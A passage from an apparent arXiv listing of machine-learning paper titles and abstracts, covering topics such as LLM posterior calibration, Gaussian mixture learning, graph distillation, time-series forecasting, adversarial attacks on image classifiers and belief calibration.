    A wide variety of natural language tasks are currently being addressed with large-scale language models (LLMs). These models are usually trained with a very large amount of unsupervised text data and adapted to perform a downstream natural language task using methods like fine-tuning, calibration or in-context learning. In this work, we propose an approach to adapt the prior class distribution to perform text classification tasks without the need for labelled samples and only few in-domain sample queries. The proposed approach treats the LLM as a black box, adding a stage where the model posteriors are calibrated to the task. Results show that these methods outperform the un-adapted model for different number of training shots in the prompt and a previous approach were calibration is performed without using any adaptation data.
    Cramer Type Distances for Learning Gaussian Mixture Models by Gradient Descent. (arXiv:2307.06753v1 [cs.LG])
    The learning of Gaussian Mixture Models (also referred to simply as GMMs) plays an important role in machine learning. Known for their expressiveness and interpretability, Gaussian mixture models have a wide range of applications, from statistics, computer vision to distributional reinforcement learning. However, as of today, few known algorithms can fit or learn these models, some of which include Expectation-Maximization algorithms and Sliced Wasserstein Distance. Even fewer algorithms are compatible with gradient descent, the common learning process for neural networks. In this paper, we derive a closed formula of two GMMs in the univariate, one-dimensional case, then propose a distance function called Sliced Cram\'er 2-distance for learning general multivariate GMMs. Our approach has several advantages over many previous methods. First, it has a closed-form expression for the univariate case and is easy to compute and implement using common machine learning libraries (e.g., PyTorch and TensorFlow). Second, it is compatible with gradient descent, which enables us to integrate GMMs with neural networks seamlessly. Third, it can fit a GMM not only to a set of data points, but also to another GMM directly, without sampling from the target model. And fourth, it has some theoretical guarantees like global gradient boundedness and unbiased sampling gradient. These features are especially useful for distributional reinforcement learning and Deep Q Networks, where the goal is to learn a distribution over future rewards. We will also construct a Gaussian Mixture Distributional Deep Q Network as a toy example to demonstrate its effectiveness. Compared with previous models, this model is parameter efficient in terms of representing a distribution and possesses better interpretability.
    A Novel Bayes' Theorem for Upper Probabilities. (arXiv:2307.06831v1 [stat.ML])
    In their seminal 1990 paper, Wasserman and Kadane establish an upper bound for the Bayes' posterior probability of a measurable set $A$, when the prior lies in a class of probability measures $\mathcal{P}$ and the likelihood is precise. They also give a sufficient condition for such upper bound to hold with equality. In this paper, we introduce a generalization of their result by additionally addressing uncertainty related to the likelihood. We give an upper bound for the posterior probability when both the prior and the likelihood belong to a set of probabilities. Furthermore, we give a sufficient condition for this upper bound to become an equality. This result is interesting on its own, and has the potential of being applied to various fields of engineering (e.g. model predictive control), machine learning, and artificial intelligence.
    Frameless Graph Knowledge Distillation. (arXiv:2307.06631v1 [cs.LG])
    Knowledge distillation (KD) has shown great potential for transferring knowledge from a complex teacher model to a simple student model in which the heavy learning task can be accomplished efficiently and without losing too much prediction accuracy. Recently, many attempts have been made by applying the KD mechanism to the graph representation learning models such as graph neural networks (GNNs) to accelerate the model's inference speed via student models. However, many existing KD-based GNNs utilize MLP as a universal approximator in the student model to imitate the teacher model's process without considering the graph knowledge from the teacher model. In this work, we provide a KD-based framework on multi-scaled GNNs, known as graph framelet, and prove that by adequately utilizing the graph knowledge in a multi-scaled manner provided by graph framelet decomposition, the student model is capable of adapting both homophilic and heterophilic graphs and has the potential of alleviating the over-squashing issue with a simple yet effectively graph surgery. Furthermore, we show how the graph knowledge supplied by the teacher is learned and digested by the student model via both algebra and geometry. Comprehensive experiments show that our proposed model can generate learning accuracy identical to or even surpass the teacher model while maintaining the high speed of inference.
    Testing Sparsity Assumptions in Bayesian Networks. (arXiv:2307.06406v1 [stat.ML])
    Bayesian network (BN) structure discovery algorithms typically either make assumptions about the sparsity of the true underlying network, or are limited by computational constraints to networks with a small number of variables. While these sparsity assumptions can take various forms, frequently the assumptions focus on an upper bound for the maximum in-degree of the underlying graph $\nabla_G$. Theorem 2 in Duttweiler et. al. (2023) demonstrates that the largest eigenvalue of the normalized inverse covariance matrix ($\Omega$) of a linear BN is a lower bound for $\nabla_G$. Building on this result, this paper provides the asymptotic properties of, and a debiasing procedure for, the sample eigenvalues of $\Omega$, leading to a hypothesis test that may be used to determine if the BN has max in-degree greater than 1. A linear BN structure discovery workflow is suggested in which the investigator uses this hypothesis test to aid in selecting an appropriate structure discovery algorithm. The hypothesis test performance is evaluated through simulations and the workflow is demonstrated on data from a human psoriasis study.
    Machine Learning practices and infrastructures. (arXiv:2307.06518v1 [cs.CY])
    Machine Learning (ML) systems, particularly when deployed in high-stakes domains, are deeply consequential. They can exacerbate existing inequities, create new modes of discrimination, and reify outdated social constructs. Accordingly, the social context (i.e. organisations, teams, cultures) in which ML systems are developed is a site of active research for the field of AI ethics, and intervention for policymakers. This paper focuses on one aspect of social context that is often overlooked: interactions between practitioners and the tools they rely on, and the role these interactions play in shaping ML practices and the development of ML systems. In particular, through an empirical study of questions asked on the Stack Exchange forums, the use of interactive computing platforms (e.g. Jupyter Notebook and Google Colab) in ML practices is explored. I find that interactive computing platforms are used in a host of learning and coordination practices, which constitutes an infrastructural relationship between interactive computing platforms and ML practitioners. I describe how ML practices are co-evolving alongside the development of interactive computing platforms, and highlight how this risks making invisible aspects of the ML life cycle that AI ethics researchers' have demonstrated to be particularly salient for the societal impact of deployed ML systems.
    MPR-Net:Multi-Scale Pattern Reproduction Guided Universality Time Series Interpretable Forecasting. (arXiv:2307.06736v1 [cs.LG])
    Time series forecasting has received wide interest from existing research due to its broad applications and inherent challenging. The research challenge lies in identifying effective patterns in historical series and applying them to future forecasting. Advanced models based on point-wise connected MLP and Transformer architectures have strong fitting power, but their secondary computational complexity limits practicality. Additionally, those structures inherently disrupt the temporal order, reducing the information utilization and making the forecasting process uninterpretable. To solve these problems, this paper proposes a forecasting model, MPR-Net. It first adaptively decomposes multi-scale historical series patterns using convolution operation, then constructs a pattern extension forecasting method based on the prior knowledge of pattern reproduction, and finally reconstructs future patterns into future series using deconvolution operation. By leveraging the temporal dependencies present in the time series, MPR-Net not only achieves linear time complexity, but also makes the forecasting process interpretable. By carrying out sufficient experiments on more than ten real data sets of both short and long term forecasting tasks, MPR-Net achieves the state of the art forecasting performance, as well as good generalization and robustness performance.
    A Novel Site-Agnostic Multimodal Deep Learning Model to Identify Pro-Eating Disorder Content on Social Media. (arXiv:2307.06775v1 [cs.LG])
    Over the last decade, there has been a vast increase in eating disorder diagnoses and eating disorder-attributed deaths, reaching their zenith during the Covid-19 pandemic. This immense growth derived in part from the stressors of the pandemic but also from increased exposure to social media, which is rife with content that promotes eating disorders. Such content can induce eating disorders in viewers. This study aimed to create a multimodal deep learning model capable of determining whether a given social media post promotes eating disorders based on a combination of visual and textual data. A labeled dataset of Tweets was collected from Twitter, upon which twelve deep learning models were trained and tested. Based on model performance, the most effective deep learning model was the multimodal fusion of the RoBERTa natural language processing model and the MaxViT image classification model, attaining accuracy and F1 scores of 95.9% and 0.959 respectively. The RoBERTa and MaxViT fusion model, deployed to classify an unlabeled dataset of posts from the social media sites Tumblr and Reddit, generated similar classifications as previous research studies that did not employ artificial intelligence, showing that artificial intelligence can develop insights congruent to those of researchers. Additionally, the model was used to conduct a time-series analysis of yet unseen Tweets from eight Twitter hashtags, uncovering that the relative abundance of pro-eating disorder content has decreased drastically. However, since approximately 2018, pro-eating disorder content has either stopped its decline or risen once more in ampleness.
    inTformer: A Time-Embedded Attention-Based Transformer for Crash Likelihood Prediction at Intersections Using Connected Vehicle Data. (arXiv:2307.03854v2 [cs.LG] UPDATED)
    The real-time crash likelihood prediction model is an essential component of the proactive traffic safety management system. Over the years, numerous studies have attempted to construct a crash likelihood prediction model in order to enhance traffic safety, but mostly on freeways. In the majority of the existing studies, researchers have primarily employed a deep learning-based framework to identify crash potential. Lately, Transformer has emerged as a potential deep neural network that fundamentally operates through attention-based mechanisms. Transformer has several functional benefits over extant deep learning models such as Long Short-Term Memory (LSTM), Convolution Neural Network (CNN), etc. Firstly, Transformer can readily handle long-term dependencies in a data sequence. Secondly, Transformers can parallelly process all elements in a data sequence during training. Finally, a Transformer does not have the vanishing gradient issue. Realizing the immense possibility of Transformers, this paper proposes inTersection-Transformer (inTformer), a time-embedded attention-based Transformer model that can effectively predict intersection crash likelihood in real-time. The proposed model was evaluated using connected vehicle data extracted from INRIX and Center for Advanced Transportation Technology (CATT) Lab's Signal Analytics Platform. The data was parallelly formatted and stacked at different timesteps to develop nine inTformer models. The best inTformer model achieved a sensitivity of 73%. This model was also compared to earlier studies on crash likelihood prediction at intersections and with several established deep learning models trained on the same connected vehicle dataset. In every scenario, this inTformer outperformed the benchmark models confirming the viability of the proposed inTformer architecture.
    An Improved Uniform Convergence Bound with Fat-Shattering Dimension. (arXiv:2307.06644v1 [cs.LG])
    The fat-shattering dimension characterizes the uniform convergence property of real-valued functions. The state-of-the-art upper bounds feature a multiplicative squared logarithmic factor on the sample complexity, leaving an open gap with the existing lower bound. We provide an improved uniform convergence bound that closes this gap.
    GRAN is superior to GraphRNN: node orderings, kernel- and graph embeddings-based metrics for graph generators. (arXiv:2307.06709v1 [cs.LG])
    A wide variety of generative models for graphs have been proposed. They are used in drug discovery, road networks, neural architecture search, and program synthesis. Generating graphs has theoretical challenges, such as isomorphic representations -- evaluating how well a generative model performs is difficult. Which model to choose depending on the application domain? We extensively study kernel-based metrics on distributions of graph invariants and manifold-based and kernel-based metrics in graph embedding space. Manifold-based metrics outperform kernel-based metrics in embedding space. We use these metrics to compare GraphRNN and GRAN, two well-known generative models for graphs, and unveil the influence of node orderings. It shows the superiority of GRAN over GraphRNN - further, our proposed adaptation of GraphRNN with a depth-first search ordering is effective for small-sized graphs. A guideline on good practices regarding dataset selection and node feature initialization is provided. Our work is accompanied by open-source code and reproducible experiments.
    Temporal Label-Refinement for Weakly-Supervised Audio-Visual Event Localization. (arXiv:2307.06385v1 [cs.CV])
    Audio-Visual Event Localization (AVEL) is the task of temporally localizing and classifying \emph{audio-visual events}, i.e., events simultaneously visible and audible in a video. In this paper, we solve AVEL in a weakly-supervised setting, where only video-level event labels (their presence/absence, but not their locations in time) are available as supervision for training. Our idea is to use a base model to estimate labels on the training data at a finer temporal resolution than at the video level and re-train the model with these labels. I.e., we determine the subset of labels for each \emph{slice} of frames in a training video by (i) replacing the frames outside the slice with those from a second video having no overlap in video-level labels, and (ii) feeding this synthetic video into the base model to extract labels for just the slice in question. To handle the out-of-distribution nature of our synthetic videos, we propose an auxiliary objective for the base model that induces more reliable predictions of the localized event labels as desired. Our three-stage pipeline outperforms several existing AVEL methods with no architectural changes and improves performance on a related weakly-supervised task as well.
    Tackling Combinatorial Distribution Shift: A Matrix Completion Perspective. (arXiv:2307.06457v1 [cs.LG])
    Obtaining rigorous statistical guarantees for generalization under distribution shift remains an open and active research area. We study a setting we call combinatorial distribution shift, where (a) under the test- and training-distributions, the labels $z$ are determined by pairs of features $(x,y)$, (b) the training distribution has coverage of certain marginal distributions over $x$ and $y$ separately, but (c) the test distribution involves examples from a product distribution over $(x,y)$ that is {not} covered by the training distribution. Focusing on the special case where the labels are given by bilinear embeddings into a Hilbert space $H$: $\mathbb{E}[z \mid x,y ]=\langle f_{\star}(x),g_{\star}(y)\rangle_{{H}}$, we aim to extrapolate to a test distribution domain that is $not$ covered in training, i.e., achieving bilinear combinatorial extrapolation. Our setting generalizes a special case of matrix completion from missing-not-at-random data, for which all existing results require the ground-truth matrices to be either exactly low-rank, or to exhibit very sharp spectral cutoffs. In this work, we develop a series of theoretical results that enable bilinear combinatorial extrapolation under gradual spectral decay as observed in typical high-dimensional data, including novel algorithms, generalization guarantees, and linear-algebraic results. A key tool is a novel perturbation bound for the rank-$k$ singular value decomposition approximations between two matrices that depends on the relative spectral gap rather than the absolute spectral gap, a result that may be of broader independent interest.
    Discovering How Agents Learn Using Few Data. (arXiv:2307.06640v1 [cs.GT])
    Decentralized learning algorithms are an essential tool for designing multi-agent systems, as they enable agents to autonomously learn from their experience and past interactions. In this work, we propose a theoretical and algorithmic framework for real-time identification of the learning dynamics that govern agent behavior using a short burst of a single system trajectory. Our method identifies agent dynamics through polynomial regression, where we compensate for limited data by incorporating side-information constraints that capture fundamental assumptions or expectations about agent behavior. These constraints are enforced computationally using sum-of-squares optimization, leading to a hierarchy of increasingly better approximations of the true agent dynamics. Extensive experiments demonstrated that our approach, using only 5 samples from a short run of a single trajectory, accurately recovers the true dynamics across various benchmarks, including equilibrium selection and prediction of chaotic systems up to 10 Lyapunov times. These findings suggest that our approach has significant potential to support effective policy and decision-making in strategic multi-agent systems.
    Quantum Autoencoders for Learning Quantum Channel Codes. (arXiv:2307.06622v1 [quant-ph])
    This work investigates the application of quantum machine learning techniques for classical and quantum communication across different qubit channel models. By employing parameterized quantum circuits and a flexible channel noise model, we develop a machine learning framework to generate quantum channel codes and evaluate their effectiveness. We explore classical, entanglement-assisted, and quantum communication scenarios within our framework. Applying it to various quantum channel models as proof of concept, we demonstrate strong performance in each case. Our results highlight the potential of quantum machine learning in advancing research on quantum communication systems, enabling a better understanding of capacity bounds under modulation constraints, various communication settings, and diverse channel models.
    Data Augmentation is a Hyperparameter: Cherry-picked Self-Supervision for Unsupervised Anomaly Detection is Creating the Illusion of Success. (arXiv:2208.07734v5 [cs.LG] UPDATED)
    Self-supervised learning (SSL) has emerged as a promising alternative to create supervisory signals to real-world problems, avoiding the extensive cost of manual labeling. SSL is particularly attractive for unsupervised tasks such as anomaly detection (AD), where labeled anomalies are rare or often nonexistent. A large catalog of augmentation functions has been used for SSL-based AD (SSAD) on image data, and recent works have reported that the type of augmentation has a significant impact on accuracy. Motivated by those, this work sets out to put image-based SSAD under a larger lens and investigate the role of data augmentation in SSAD. Through extensive experiments on 3 different detector models and across 420 AD tasks, we provide comprehensive numerical and visual evidences that the alignment between data augmentation and anomaly-generating mechanism is the key to the success of SSAD, and in the lack thereof, SSL may even impair accuracy. To the best of our knowledge, this is the first meta-analysis on the role of data augmentation in SSAD.
    DRAGON: A Dialogue-Based Robot for Assistive Navigation with Visual Language Grounding. (arXiv:2307.06924v1 [cs.RO])
    Persons with visual impairments (PwVI) have difficulties understanding and navigating spaces around them. Current wayfinding technologies either focus solely on navigation or provide limited communication about the environment. Motivated by recent advances in visual-language grounding and semantic navigation, we propose DRAGON, a guiding robot powered by a dialogue system and the ability to associate the environment with natural language. By understanding the commands from the user, DRAGON is able to guide the user to the desired landmarks on the map, describe the environment, and answer questions from visual observations. Through effective utilization of dialogue, the robot can ground the user's free-form descriptions to landmarks in the environment, and give the user semantic information through spoken language. We conduct a user study with blindfolded participants in an everyday indoor environment. Our results demonstrate that DRAGON is able to communicate with the user smoothly, provide a good guiding experience, and connect users with their surrounding environment in an intuitive manner.
    Sequential Experimental Design for X-Ray CT Using Deep Reinforcement Learning. (arXiv:2307.06343v1 [eess.IV])
    In X-ray Computed Tomography (CT), projections from many angles are acquired and used for 3D reconstruction. To make CT suitable for in-line quality control, reducing the number of angles while maintaining reconstruction quality is necessary. Sparse-angle tomography is a popular approach for obtaining 3D reconstructions from limited data. To optimize its performance, one can adapt scan angles sequentially to select the most informative angles for each scanned object. Mathematically, this corresponds to solving and optimal experimental design (OED) problem. OED problems are high-dimensional, non-convex, bi-level optimization problems that cannot be solved online, i.e., during the scan. To address these challenges, we pose the OED problem as a partially observable Markov decision process in a Bayesian framework, and solve it through deep reinforcement learning. The approach learns efficient non-greedy policies to solve a given class of OED problems through extensive offline training rather than solving a given OED problem directly via numerical optimization. As such, the trained policy can successfully find the most informative scan angles online. We use a policy training method based on the Actor-Critic approach and evaluate its performance on 2D tomography with synthetic data.
    Multivariate Time Series characterization and forecasting of VoIP traffic in real mobile networks. (arXiv:2307.06645v1 [cs.NI])
    Predicting the behavior of real-time traffic (e.g., VoIP) in mobility scenarios could help the operators to better plan their network infrastructures and to optimize the allocation of resources. Accordingly, in this work the authors propose a forecasting analysis of crucial QoS/QoE descriptors (some of which neglected in the technical literature) of VoIP traffic in a real mobile environment. The problem is formulated in terms of a multivariate time series analysis. Such a formalization allows to discover and model the temporal relationships among various descriptors and to forecast their behaviors for future periods. Techniques such as Vector Autoregressive models and machine learning (deep-based and tree-based) approaches are employed and compared in terms of performance and time complexity, by reframing the multivariate time series problem into a supervised learning one. Moreover, a series of auxiliary analyses (stationarity, orthogonal impulse responses, etc.) are performed to discover the analytical structure of the time series and to provide deep insights about their relationships. The whole theoretical analysis has an experimental counterpart since a set of trials across a real-world LTE-Advanced environment has been performed to collect, post-process and analyze about 600,000 voice packets, organized per flow and differentiated per codec.
    Assessment of the suitability of degradation models for the planning of CCTV inspections of sewer pipes. (arXiv:2307.06341v1 [cs.LG])
    The degradation of sewer pipes poses significant economical, environmental and health concerns. The maintenance of such assets requires structured plans to perform inspections, which are more efficient when structural and environmental features are considered along with the results of previous inspection reports. The development of such plans requires degradation models that can be based on statistical and machine learning methods. This work proposes a methodology to assess their suitability to plan inspections considering three dimensions: accuracy metrics, ability to produce long-term degradation curves and explainability. Results suggest that although ensemble models yield the highest accuracy, they are unable to infer the long-term degradation of the pipes, whereas the Logistic Regression offers a slightly less accurate model that is able to produce consistent degradation curves with a high explainability. A use case is presented to demonstrate this methodology and the efficiency of model-based planning compared to the current inspection plan.
    Stochastic Delay Differential Games: Financial Modeling and Machine Learning Algorithms. (arXiv:2307.06450v1 [math.OC])
    In this paper, we propose a numerical methodology for finding the closed-loop Nash equilibrium of stochastic delay differential games through deep learning. These games are prevalent in finance and economics where multi-agent interaction and delayed effects are often desired features in a model, but are introduced at the expense of increased dimensionality of the problem. This increased dimensionality is especially significant as that arising from the number of players is coupled with the potential infinite dimensionality caused by the delay. Our approach involves parameterizing the controls of each player using distinct recurrent neural networks. These recurrent neural network-based controls are then trained using a modified version of Brown's fictitious play, incorporating deep learning techniques. To evaluate the effectiveness of our methodology, we test it on finance-related problems with known solutions. Furthermore, we also develop new problems and derive their analytical Nash equilibrium solutions, which serve as additional benchmarks for assessing the performance of our proposed deep learning approach.  ( 2 min )
    Trainability, Expressivity and Interpretability in Gated Neural ODEs. (arXiv:2307.06398v1 [cs.LG])
    Understanding how the dynamics in biological and artificial neural networks implement the computations required for a task is a salient open question in machine learning and neuroscience. In particular, computations requiring complex memory storage and retrieval pose a significant challenge for these networks to implement or learn. Recently, a family of models described by neural ordinary differential equations (nODEs) has emerged as powerful dynamical neural network models capable of capturing complex dynamics. Here, we extend nODEs by endowing them with adaptive timescales using gating interactions. We refer to these as gated neural ODEs (gnODEs). Using a task that requires memory of continuous quantities, we demonstrate the inductive bias of the gnODEs to learn (approximate) continuous attractors. We further show how reduced-dimensional gnODEs retain their modeling power while greatly improving interpretability, even allowing explicit visualization of the structure of learned attractors. We introduce a novel measure of expressivity which probes the capacity of a neural network to generate complex trajectories. Using this measure, we explore how the phase-space dimension of the nODEs and the complexity of the function modeling the flow field contribute to expressivity. We see that a more complex function for modeling the flow field allows a lower-dimensional nODE to capture a given target dynamics. Finally, we demonstrate the benefit of gating in nODEs on several real-world tasks.  ( 2 min )
    Artificial Intelligence for Drug Discovery: Are We There Yet?. (arXiv:2307.06521v1 [cs.AI])
    Drug discovery is adapting to novel technologies such as data science, informatics, and artificial intelligence (AI) to accelerate effective treatment development while reducing costs and animal experiments. AI is transforming drug discovery, as indicated by increasing interest from investors, industrial and academic scientists, and legislators. Successful drug discovery requires optimizing properties related to pharmacodynamics, pharmacokinetics, and clinical outcomes. This review discusses the use of AI in the three pillars of drug discovery: diseases, targets, and therapeutic modalities, with a focus on small molecule drugs. AI technologies, such as generative chemistry, machine learning, and multi-property optimization, have enabled several compounds to enter clinical trials. The scientific community must carefully vet known information to address the reproducibility crisis. The full potential of AI in drug discovery can only be realized with sufficient ground truth and appropriate human intervention at later pipeline stages.
    Metal Oxide-based Gas Sensor Array for the VOCs Analysis in Complex Mixtures using Machine Learning. (arXiv:2307.06556v1 [physics.app-ph])
    Detection of Volatile Organic Compounds (VOCs) from the breath is becoming a viable route for the early detection of diseases non-invasively. This paper presents a sensor array with three metal oxide electrodes that can use machine learning methods to identify four distinct VOCs in a mixture. The metal oxide sensor array was subjected to various VOC concentrations, including ethanol, acetone, toluene and chloroform. The dataset obtained from individual gases and their mixtures were analyzed using multiple machine learning algorithms, such as Random Forest (RF), K-Nearest Neighbor (KNN), Decision Tree, Linear Regression, Logistic Regression, Naive Bayes, Linear Discriminant Analysis, Artificial Neural Network, and Support Vector Machine. KNN and RF have shown more than 99% accuracy in classifying different varying chemicals in the gas mixtures. In regression analysis, KNN has delivered the best results with R2 value of more than 0.99 and LOD of 0.012, 0.015, 0.014 and 0.025 PPM for predicting the concentrations of varying chemicals Acetone, Toluene, Ethanol, and Chloroform, respectively in complex mixtures. Therefore, it is demonstrated that the array utilizing the provided algorithms can classify and predict the concentrations of the four gases simultaneously for disease diagnosis and treatment monitoring.  ( 2 min )
    Microbial Genetic Algorithm-based Black-box Attack against Interpretable Deep Learning Systems. (arXiv:2307.06496v1 [cs.CV])
    Deep learning models are susceptible to adversarial samples in white and black-box environments. Although previous studies have shown high attack success rates, coupling DNN models with interpretation models could offer a sense of security when a human expert is involved, who can identify whether a given sample is benign or malicious. However, in white-box environments, interpretable deep learning systems (IDLSes) have been shown to be vulnerable to malicious manipulations. In black-box settings, as access to the components of IDLSes is limited, it becomes more challenging for the adversary to fool the system. In this work, we propose a Query-efficient Score-based black-box attack against IDLSes, QuScore, which requires no knowledge of the target model and its coupled interpretation model. QuScore is based on transfer-based and score-based methods by employing an effective microbial genetic algorithm. Our method is designed to reduce the number of queries necessary to carry out successful attacks, resulting in a more efficient process. By continuously refining the adversarial samples created based on feedback scores from the IDLS, our approach effectively navigates the search space to identify perturbations that can fool the system. We evaluate the attack's effectiveness on four CNN models (Inception, ResNet, VGG, DenseNet) and two interpretation models (CAM, Grad), using both ImageNet and CIFAR datasets. Our results show that the proposed approach is query-efficient with a high attack success rate that can reach between 95% and 100% and transferability with an average success rate of 69% in the ImageNet and CIFAR datasets. Our attack method generates adversarial examples with attribution maps that resemble benign samples. We have also demonstrated that our attack is resilient against various preprocessing defense techniques and can easily be transferred to different DNN models.  ( 3 min )
    Convergence of Message Passing Graph Neural Networks with Generic Aggregation On Large Random Graphs. (arXiv:2304.11140v2 [stat.ML] UPDATED)
    We study the convergence of message passing graph neural networks on random graph models to their continuous counterpart as the number of nodes tends to infinity. Until now, this convergence was only known for architectures with aggregation functions in the form of normalized means, or, equivalently, of an application of classical operators like the adjacency matrix or the graph Laplacian. We extend such results to a large class of aggregation functions, that encompasses all classically used message passing graph neural networks, such as attention-based message passing, max convolutional message passing or (degree-normalized) convolutional message passing. Under mild assumptions, we give non-asymptotic bounds with high probability to quantify this convergence. Our main result is based on the McDiarmid inequality. Interestingly, this result does not apply to the case where the aggregation is a coordinate-wise maximum. We treat this case separately and obtain a different convergence rate.
    Deep Network Approximation: Beyond ReLU to Diverse Activation Functions. (arXiv:2307.06555v1 [cs.LG])
    This paper explores the expressive power of deep neural networks for a diverse range of activation functions. An activation function set $\mathscr{A}$ is defined to encompass the majority of commonly used activation functions, such as $\mathtt{ReLU}$, $\mathtt{LeakyReLU}$, $\mathtt{ReLU}^2$, $\mathtt{ELU}$, $\mathtt{SELU}$, $\mathtt{Softplus}$, $\mathtt{GELU}$, $\mathtt{SiLU}$, $\mathtt{Swish}$, $\mathtt{Mish}$, $\mathtt{Sigmoid}$, $\mathtt{Tanh}$, $\mathtt{Arctan}$, $\mathtt{Softsign}$, $\mathtt{dSiLU}$, and $\mathtt{SRS}$. We demonstrate that for any activation function $\varrho\in \mathscr{A}$, a $\mathtt{ReLU}$ network of width $N$ and depth $L$ can be approximated to arbitrary precision by a $\varrho$-activated network of width $6N$ and depth $2L$ on any bounded set. This finding enables the extension of most approximation results achieved with $\mathtt{ReLU}$ networks to a wide variety of other activation functions, at the cost of slightly larger constants.  ( 2 min )
    Convolutional Neural Networks for Sentiment Analysis on Weibo Data: A Natural Language Processing Approach. (arXiv:2307.06540v1 [cs.CL])
    This study addressed the complex task of sentiment analysis on a dataset of 119,988 original tweets from Weibo using a Convolutional Neural Network (CNN), offering a new approach to Natural Language Processing (NLP). The data, sourced from Baidu's PaddlePaddle AI platform, were meticulously preprocessed, tokenized, and categorized based on sentiment labels. A CNN-based model was utilized, leveraging word embeddings for feature extraction, and trained to perform sentiment classification. The model achieved a macro-average F1-score of approximately 0.73 on the test set, showing balanced performance across positive, neutral, and negative sentiments. The findings underscore the effectiveness of CNNs for sentiment analysis tasks, with implications for practical applications in social media analysis, market research, and policy studies. The complete experimental content and code have been made publicly available on the Kaggle data platform for further research and development. Future work may involve exploring different architectures, such as Recurrent Neural Networks (RNN) or transformers, or using more complex pre-trained models like BERT, to further improve the model's ability to understand linguistic nuances and context.  ( 2 min )
    Introducing Foundation Models as Surrogate Models: Advancing Towards More Practical Adversarial Attacks. (arXiv:2307.06608v1 [cs.LG])
    Recently, the no-box adversarial attack, in which the attacker lacks access to the model's architecture, weights, and training data, become the most practical and challenging attack setup. However, there is an unawareness of the potential and flexibility inherent in the surrogate model selection process on no-box setting. Inspired by the burgeoning interest in utilizing foundational models to address downstream tasks, this paper adopts an innovative idea that 1) recasting adversarial attack as a downstream task. Specifically, image noise generation to meet the emerging trend and 2) introducing foundational models as surrogate models. Harnessing the concept of non-robust features, we elaborate on two guiding principles for surrogate model selection to explain why the foundational model is an optimal choice for this role. However, paradoxically, we observe that these foundational models underperform. Analyzing this unexpected behavior within the feature space, we attribute the lackluster performance of foundational models (e.g., CLIP) to their significant representational capacity and, conversely, their lack of discriminative prowess. To mitigate this issue, we propose the use of a margin-based loss strategy for the fine-tuning of foundational models on target images. The experimental results verify that our approach, which employs the basic Fast Gradient Sign Method (FGSM) attack algorithm, outstrips the performance of other, more convoluted algorithms. We conclude by advocating for the research community to consider surrogate models as crucial determinants in the effectiveness of adversarial attacks in no-box settings. The implications of our work bear relevance for improving the efficacy of such adversarial attacks and the overall robustness of AI systems.  ( 3 min )
    Equalization in Dispersion-Managed Systems Using Learned Digital Back-Propagation. (arXiv:2307.06821v1 [cs.NI])
    In this paper, we investigate the use of the learned digital back-propagation (LDBP) for equalizing dual-polarization fiber-optic transmission in dispersion-managed (DM) links. LDBP is a deep neural network that optimizes the parameters of DBP using the stochastic gradient descent. We evaluate DBP and LDBP in a simulated WDM dual-polarization fiber transmission system operating at the bitrate of 256 Gbit/s per channel, with a dispersion map designed for a 2016 km link with 15% residual dispersion. Our results show that in single-channel transmission, LDBP achieves an effective signal-to-noise ratio improvement of 6.3 dB and 2.5 dB, respectively, over linear equalization and DBP. In WDM transmission, the corresponding $Q$-factor gains are 1.1 dB and 0.4 dB, respectively. Additionally, we conduct a complexity analysis, which reveals that a frequency-domain implementation of LDBP and DBP is more favorable in terms of complexity than the time-domain implementation. These findings demonstrate the effectiveness of LDBP in mitigating the nonlinear effects in DM fiber-optic transmission systems.
    Misclassification in Automated Content Analysis Causes Bias in Regression. Can We Fix It? Yes We Can!. (arXiv:2307.06483v1 [cs.LG])
    Automated classifiers (ACs), often built via supervised machine learning (SML), can categorize large, statistically powerful samples of data ranging from text to images and video, and have become widely popular measurement devices in communication science and related fields. Despite this popularity, even highly accurate classifiers make errors that cause misclassification bias and misleading results in downstream analyses-unless such analyses account for these errors. As we show in a systematic literature review of SML applications, communication scholars largely ignore misclassification bias. In principle, existing statistical methods can use "gold standard" validation data, such as that created by human annotators, to correct misclassification bias and produce consistent estimates. We introduce and test such methods, including a new method we design and implement in the R package misclassificationmodels, via Monte Carlo simulations designed to reveal each method's limitations, which we also release. Based on our results, we recommend our new error correction method as it is versatile and efficient. In sum, automated classifiers, even those below common accuracy standards or making systematic misclassifications, can be useful for measurement with careful study design and appropriate error correction methods.
    Energy Discrepancies: A Score-Independent Loss for Energy-Based Models. (arXiv:2307.06431v1 [stat.ML])
    Energy-based models are a simple yet powerful class of probabilistic models, but their widespread adoption has been limited by the computational burden of training them. We propose a novel loss function called Energy Discrepancy (ED) which does not rely on the computation of scores or expensive Markov chain Monte Carlo. We show that ED approaches the explicit score matching and negative log-likelihood loss under different limits, effectively interpolating between both. Consequently, minimum ED estimation overcomes the problem of nearsightedness encountered in score-based estimation methods, while also enjoying theoretical guarantees. Through numerical experiments, we demonstrate that ED learns low-dimensional data distributions faster and more accurately than explicit score matching or contrastive divergence. For high-dimensional image data, we describe how the manifold hypothesis puts limitations on our approach and demonstrate the effectiveness of energy discrepancy by training the energy-based model as a prior of a variational decoder model.  ( 2 min )
    Leveraging Contextual Counterfactuals Toward Belief Calibration. (arXiv:2307.06513v1 [cs.AI])
    Beliefs and values are increasingly being incorporated into our AI systems through alignment processes, such as carefully curating data collection principles or regularizing the loss function used for training. However, the meta-alignment problem is that these human beliefs are diverse and not aligned across populations; furthermore, the implicit strength of each belief may not be well calibrated even among humans, especially when trying to generalize across contexts. Specifically, in high regret situations, we observe that contextual counterfactuals and recourse costs are particularly important in updating a decision maker's beliefs and the strengths to which such beliefs are held. Therefore, we argue that including counterfactuals is key to an accurate calibration of beliefs during alignment. To do this, we first segment belief diversity into two categories: subjectivity (across individuals within a population) and epistemic uncertainty (within an individual across different contexts). By leveraging our notion of epistemic uncertainty, we introduce `the belief calibration cycle' framework to more holistically calibrate this diversity of beliefs with context-driven counterfactual reasoning by using a multi-objective optimization. We empirically apply our framework for finding a Pareto frontier of clustered optimal belief strengths that generalize across different contexts, demonstrating its efficacy on a toy dataset for credit decisions.
    On the Effective Horizon of Inverse Reinforcement Learning. (arXiv:2307.06541v1 [cs.LG])
